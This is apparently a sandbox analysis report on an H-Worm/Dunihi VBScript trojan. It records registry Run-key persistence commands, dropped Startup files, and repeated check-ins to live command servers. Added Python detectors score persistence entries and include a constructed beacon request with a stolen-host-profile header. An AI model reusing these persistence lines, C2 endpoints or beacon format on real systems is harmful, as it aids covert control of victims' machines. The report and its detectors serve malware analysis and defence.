File name: Juzgado 61 Administrativo Circuito #646862.vbe

Full analysis: https://app.any.run/tasks/35030967-22ae-4a05-aca1-fdd1c0efc59a
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on the family, a trojan's capabilities range from full remote control of the victim's machine to stealing data and files and dropping further malware, so the core functionality differs significantly from one family to the next. The most common trojan infection chain starts with a phishing email.

Analysis date: May 20, 2019, 22:58:50
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
dunihi
Indicators:
MIME: application/octet-stream
File info: data (a .vbe is VBScript obfuscated with Microsoft's Script Encoder, which generic file typing reports as plain data)
MD5: 71ED0BF42E970573E9D0012CD21211E1
SHA1: 71CCBEBA75A06108634AFD3D397C7126CFA73CFE
SHA256: 965808A592A0643598544EF28B9A3ABD5677CD55B4390F5F86C9EFCB2B0A7481
SSDEEP: 1536:wyWCSEqiw0xbizetD7ajuI1mr6/lwK90IfjcTbr6/FFnMdNn1f5HQ+mdhWK0l:wyY9q7Gk2/lF0ogTbr6/FFnM7n163dYH

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes the autorun value in the registry

      • WScript.exe (PID: 3288)
      • wscript.exe (PID: 3952)
    • Writes to a start menu file

      • wscript.exe (PID: 3952)
      • WScript.exe (PID: 3288)
    • DUNIHI was detected

      • wscript.exe (PID: 3952)
    • Connects to CnC server

      • wscript.exe (PID: 3952)
  • SUSPICIOUS

    • Creates files in the user directory

      • WScript.exe (PID: 3288)
      • wscript.exe (PID: 3952)
    • Application launched itself

      • WScript.exe (PID: 3288)
    • Executes scripts

      • WScript.exe (PID: 3288)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 34
Monitored processes: 2
Malicious processes: 2
Suspicious processes: 0

Behavior graph

start -> WScript.exe (PID 3288) -> wscript.exe (PID 3952, #DUNIHI)

Process information

PID: 3288
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Juzgado 61 Administrativo Circuito #646862.vbe"
Path: C:\Windows\System32\WScript.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Exit code: 0
Version: 5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID: 3952
CMD: "C:\Windows\System32\wscript.exe" //B "C:\Users\admin\AppData\Roaming\BSxtKCnLwv.vbs"
Path: C:\Windows\System32\wscript.exe
Parent process: WScript.exe (PID 3288)
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Exit code: 0
Version: 5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
Total events: 345
Read events: 279
Write events: 66
Delete events: 0

Modification events

PID 3288 WScript.exe
  Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
  Operation: write   Name: UNCAsIntranet   Value: 0

PID 3288 WScript.exe
  Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
  Operation: write   Name: AutoDetect   Value: 1

PID 3952 wscript.exe
  Key: HKEY_LOCAL_MACHINE\SOFTWARE\BSxtKCnLwv
  Operation: write   Name: (default)   Value: false - 5/20/2019

PID 3952 wscript.exe
  Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  Operation: write   Name: BSxtKCnLwv
  Value: wscript.exe //B "C:\Users\admin\AppData\Roaming\BSxtKCnLwv.vbs"

PID 3952 wscript.exe
  Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  Operation: write   Name: BSxtKCnLwv
  Value: wscript.exe //B "C:\Users\admin\AppData\Roaming\BSxtKCnLwv.vbs"

PID 3288 WScript.exe
  Key: HKEY_CURRENT_USER\Software\C4BA3647_Juzgado 61 Administrativo Circuito #646862
  Operation: write   Name: (default)   Value: false - 5/20/2019

PID 3288 WScript.exe
  Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
  Operation: write   Name: ShowSuperHidden   Value: 0

PID 3288 WScript.exe
  Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
  Operation: write   Name: HideFileExt   Value: 1

PID 3288 WScript.exe
  Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  Operation: write   Name: Juzgado 61 Administrativo Circuito #646862
  Value: wscript.exe //B "C:\Users\admin\AppData\Local\Temp\Juzgado 61 Administrativo Circuito #646862.vbe"

PID 3288 WScript.exe
  Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  Operation: write   Name: Juzgado 61 Administrativo Circuito #646862
  Value: wscript.exe //B "C:\Users\admin\AppData\Local\Temp\Juzgado 61 Administrativo Circuito #646862.vbe"
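The registry writes above are the whole persistence story of this sample: both scripts register themselves under the HKCU and HKLM Run keys as `wscript.exe //B <script in AppData>`, copy themselves into the Startup folder, and flip the Explorer settings that hide extensions and system files. The following triage helper, added here as an example and not ANY.RUN's code, scores autorun entries and Startup-folder listings for exactly that pattern. Its sample data is constructed from this report's Modification events and Dropped files sections; the OneDrive entry and desktop.ini are constructed benign controls, and the regular expressions and function names are the author's own.

```python
"""Triage of the persistence pattern recorded above: Run-key values and Startup
folder entries that launch wscript.exe in silent mode (//B) on a script kept in
a user-writable directory, plus the Explorer view settings the script touched.
Added example, not ANY.RUN code. Sample data is constructed from the registry
writes and dropped files listed in this report; the OneDrive entry and
desktop.ini are constructed benign controls."""
from __future__ import annotations
import re

# (key, value name, data) triples, taken from the Modification events section.
SAMPLE_RUN_VALUES = [
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
     "BSxtKCnLwv",
     r'wscript.exe //B "C:\Users\admin\AppData\Roaming\BSxtKCnLwv.vbs"'),
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "Juzgado 61 Administrativo Circuito #646862",
     r'wscript.exe //B "C:\Users\admin\AppData\Local\Temp\Juzgado 61 Administrativo Circuito #646862.vbe"'),
    # Constructed benign control, not from the report.
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
     "OneDrive",
     r'"C:\Users\admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
]

# Startup folder listing from the Dropped files section (desktop.ini is constructed).
STARTUP = r"C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
SAMPLE_STARTUP_FILES = [
    STARTUP + r"\BSxtKCnLwv.vbs",
    STARTUP + r"\Juzgado 61 Administrativo Circuito #646862.vbe",
    STARTUP + r"\desktop.ini",
]

# Explorer\Advanced values written by PID 3288 (Modification events section).
SAMPLE_EXPLORER_VALUES = {"ShowSuperHidden": 0, "HideFileExt": 1}

# wscript/cscript as the autorun target, optionally with a full path and quotes.
SCRIPT_HOST = re.compile(r'(?:^|\\|")[wc]script(?:\.exe)?"?\s', re.I)
# //B = batch mode: no error dialogs or prompts, so a broken script stays silent.
SILENT_FLAG = re.compile(r"(?:^|\s)//B(?:\s|$)", re.I)
# First Windows path ending in a script-host extension.
SCRIPT_PATH = re.compile(r'"?(?P<path>[A-Za-z]:\\[^"]+?\.(?:vbs|vbe|js|jse|wsf))"?', re.I)
# Directories any user process can write to without elevation.
USER_WRITABLE = re.compile(r"\\AppData\\(?:Roaming|Local\\Temp)\\|\\Users\\Public\\|\\ProgramData\\", re.I)
SCRIPT_EXT = re.compile(r"\.(?:vbs|vbe|js|jse|wsf|hta)$", re.I)


def classify_run_value(data: str) -> list:
    """Return the reasons an autorun command line looks like script-host persistence."""
    reasons = []
    if not SCRIPT_HOST.search(data):
        return reasons
    reasons.append("script host (wscript/cscript) is the autorun target")
    if SILENT_FLAG.search(data):
        reasons.append("//B silent mode suppresses script errors and prompts")
    m = SCRIPT_PATH.search(data)
    if m and USER_WRITABLE.search(m.group("path")):
        reasons.append("script lives in a user-writable directory: " + m.group("path"))
    return reasons


def classify_startup_file(path: str) -> list:
    """Flag script files placed in the per-user Startup folder."""
    name = path.rsplit("\\", 1)[-1]
    return [f"script file in Startup folder: {name}"] if SCRIPT_EXT.search(name) else []


def explorer_concealment(values: dict) -> list:
    """Explorer settings that help a .vbs pose as a document. Both values are the
    Windows defaults, so they corroborate other findings rather than stand alone;
    the signal is that a script host wrote them."""
    hits = []
    if values.get("HideFileExt") == 1:
        hits.append("HideFileExt=1: known extensions hidden")
    if values.get("ShowSuperHidden") == 0:
        hits.append("ShowSuperHidden=0: protected operating-system files hidden")
    return hits


def triage(run_values, startup_files, explorer_values) -> list:
    """Collect every finding as {'source': ..., 'reasons': [...]}."""
    findings = []
    for key, name, data in run_values:
        reasons = classify_run_value(data)
        if reasons:
            findings.append({"source": key + "\\" + name, "reasons": reasons})
    for path in startup_files:
        reasons = classify_startup_file(path)
        if reasons:
            findings.append({"source": path, "reasons": reasons})
    hits = explorer_concealment(explorer_values)
    if hits:
        findings.append({"source": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced",
                         "reasons": hits})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_RUN_VALUES, SAMPLE_STARTUP_FILES, SAMPLE_EXPLORER_VALUES):
        print(f["source"])
        for r in f["reasons"]:
            print("   -", r)
```

On a live host the three inputs come from `reg query` of the Run keys (both hives, since this sample wrote HKLM from a medium-integrity process, which only works where UAC is off or the user is a local administrator without prompting), a directory listing of the Startup folder, and the Explorer\Advanced values; the scoring is deliberately conservative so that a single default Explorer setting never raises a finding on its own.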
Executable files: 0
Suspicious files: 1
Text files: 5
Unknown types: 0

Dropped files

PID 3288 WScript.exe
  C:\Users\admin\AppData\Roaming\BSxtKCnLwv.vbs   (text)
  MD5 / SHA256: not listed in the report

PID 3288 WScript.exe
  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Juzgado 61 Administrativo Circuito #646862.vbe   (binary)
  MD5 / SHA256: not listed in the report

PID 3952 wscript.exe
  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BSxtKCnLwv.vbs   (text)
  MD5 / SHA256: not listed in the report

PID 3288 WScript.exe
  C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini   (ini)
  MD5: 4A3DEB274BB5F0212C2419D3D8D08612
  SHA256: 2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38

PID 3288 WScript.exe
  C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini   (ini)
  MD5: 4A3DEB274BB5F0212C2419D3D8D08612
  SHA256: 2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 12
TCP/UDP connections: 18
DNS requests: 3
Threats: 20

HTTP requests

#   PID   Process      Method  HTTP Code  IP                    URL                                   CN  Type  Size  Reputation
1   3952  wscript.exe  POST    -          23.105.131.225:3456   http://savelifes.tech:3456/is-ready   US  -     -     malicious
2   3952  wscript.exe  POST    -          23.105.131.225:3456   http://savelifes.tech:3456/is-ready   US  -     -     malicious
3   3952  wscript.exe  POST    -          23.105.131.225:3456   http://savelifes.tech:3456/is-ready   US  -     -     malicious
4   3952  wscript.exe  POST    -          23.105.131.225:3456   http://savelifes.tech:3456/is-ready   US  -     -     malicious
5   3952  wscript.exe  POST    -          23.105.131.225:3456   http://savelifes.tech:3456/is-ready   US  -     -     malicious
6   3952  wscript.exe  POST    -          23.105.131.225:3456   http://savelifes.tech:3456/is-ready   US  -     -     malicious
7   3952  wscript.exe  POST    -          23.105.131.225:3456   http://savelifes.tech:3456/is-ready   US  -     -     malicious
8   3952  wscript.exe  POST    200        23.105.131.225:3456   http://savelifes.tech:3456/is-ready   US  text  12 b  malicious
9   3952  wscript.exe  POST    200        23.105.131.225:3456   http://savelifes.tech:3456/is-ready   US  text  12 b  malicious
10  3952  wscript.exe  POST    200        23.105.131.225:3456   http://savelifes.tech:3456/is-ready   US  text  12 b  malicious

"-" marks a field the report leaves empty: rows 1-7 record no response, rows 8-10 received HTTP 200 with a 12-byte text body.
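The ten requests above are the beacon loop: the same empty POST to /is-ready on port 3456, repeated until the server answers with a short text command. The detector below, added here as an example and not code from ANY.RUN or the Emerging Threats rule set, parses raw HTTP requests and scores each on the traits visible in this table (POST to an /is- path, non-standard port, empty body, repetition against one host/port/path) plus the User-Agent check the "Checkin UA" signature relies on. The raw requests are constructed: the report records only method, host, URL and response, and the User-Agent layout (host profile fields joined by `<|>`) is taken from the publicly available Houdini/H-Worm script source, so it is an assumption about this sample until confirmed against the PCAP.

```python
"""Detection logic for the check-in traffic in the HTTP requests above: repeated
POSTs to /is-ready on a non-standard port, which the IDS signatures later in this
report label Dunihi/Houdini/H-Worm. Added example, not ANY.RUN or Emerging
Threats code. The raw requests are constructed; the "<|>"-delimited User-Agent
comes from the public Houdini/H-Worm script source and is an assumption about
this particular sample."""
from __future__ import annotations
from collections import Counter
from urllib.parse import urlsplit

HWORM_CHECKIN = (
    "POST http://savelifes.tech:3456/is-ready HTTP/1.1\r\n"
    "Host: savelifes.tech:3456\r\n"
    # Constructed profile: volume serial, hostname, user, OS, "plus", AV, USB flag.
    "User-Agent: 1A2B3C4D<|>ADMIN-PC<|>admin<|>Microsoft Windows 7 Professional<|>plus<|>nan-av<|>false\r\n"
    "Content-Length: 0\r\n\r\n"
)
# Constructed benign control: an ordinary browser form submission.
BROWSER_POST = (
    "POST http://example.com/login HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 27\r\n\r\n"
    "user=alice&password=secret1"
)
SAMPLE_REQUESTS = [HWORM_CHECKIN] * 3 + [BROWSER_POST]


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, target parts and lower-cased headers."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    return {"method": method, "host": url.hostname, "port": url.port or 80,
            "path": url.path, "headers": headers, "body": body}


def score_request(req: dict) -> list:
    """Reasons a single request looks like an H-Worm beacon; empty if none."""
    reasons = []
    ua = req["headers"].get("user-agent", "")
    # The report shows /is-ready; the family's other commands share the /is- prefix.
    if req["method"] == "POST" and req["path"].startswith("/is-"):
        reasons.append(f"POST to H-Worm style command path {req['path']}")
    if "<|>" in ua:
        reasons.append("User-Agent is a '<|>'-delimited host profile, not a browser string")
    if req["port"] not in (80, 443, 8080):
        reasons.append(f"plain HTTP on non-standard port {req['port']}")
    if req["method"] == "POST" and req["headers"].get("content-length") == "0":
        reasons.append("empty POST body: a beacon, not a form submission")
    return reasons


def detect_beacons(raw_requests, min_repeats: int = 3):
    """Score each request and count repeats per (host, port, path): the report
    shows the same POST ten times, so polling cadence is itself a signal."""
    alerts = []
    counter = Counter()
    for raw in raw_requests:
        req = parse_request(raw)
        key = (req["host"], req["port"], req["path"])
        counter[key] += 1
        reasons = score_request(req)
        if reasons:
            alerts.append({"target": key, "reasons": reasons})
    repeated = {k: n for k, n in counter.items() if n >= min_repeats}
    return alerts, repeated


if __name__ == "__main__":
    alerts, repeated = detect_beacons(SAMPLE_REQUESTS)
    for a in alerts:
        print("%s:%d%s" % a["target"], "->", "; ".join(a["reasons"]))
    for k, n in repeated.items():
        print("repeated beacon %s:%d%s x%d" % (k + (n,)))
```

Two caveats from this report itself: the original .vbe (PID 3288) also opens a TCP connection to registroclient.duckdns.org:7172 that never appears in the HTTP table, so a detector keyed on HTTP alone misses that second controller and should be paired with the dynamic-DNS alerting the IDS already raised; and an HTTP 200 with a 12-byte text body is the server talking back, so rows 8-10 are the ones to pull from the PCAP to see what command the operator issued.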

Connections

PID   Process      IP:port               Domain                       ASN                                  CN  Reputation
3952  wscript.exe  23.105.131.225:3456   savelifes.tech               Nobis Technology Group, LLC          US  malicious
3288  WScript.exe  191.88.248.244:7172   registroclient.duckdns.org   EPM Telecomunicaciones S.A. E.S.P.   CO  malicious
-     -            23.105.131.225:3456   savelifes.tech               Nobis Technology Group, LLC          US  malicious

The last row carries no PID or process name in the report.

DNS requests

Domain                       IP               Reputation
savelifes.tech               23.105.131.225   malicious
registroclient.duckdns.org   191.88.248.244   malicious

Threats

PID   Process      Class                          Message
3952  wscript.exe  A Network Trojan was detected  ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
3952  wscript.exe  A Network Trojan was detected  ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin UA
3952  wscript.exe  A Network Trojan was detected  MALWARE [PTsecurity] Dunihi VBS.Downloader.Trojan
1056  svchost.exe  Misc activity                  ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
1056  svchost.exe  Misc activity                  ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
3952  wscript.exe  A Network Trojan was detected  ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
3952  wscript.exe  A Network Trojan was detected  ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin UA
3952  wscript.exe  A Network Trojan was detected  MALWARE [PTsecurity] Dunihi VBS.Downloader.Trojan
3952  wscript.exe  A Network Trojan was detected  ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
3952  wscript.exe  A Network Trojan was detected  ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin UA

The two DYNAMIC_DNS alerts are attributed to svchost.exe (PID 1056) because the Windows DNS Client service issues lookups on behalf of other processes; the name being resolved, registroclient.duckdns.org, is the one WScript.exe (PID 3288) connects to in the Connections table, so this is the script host's lookup and not a separately compromised service.
No debug info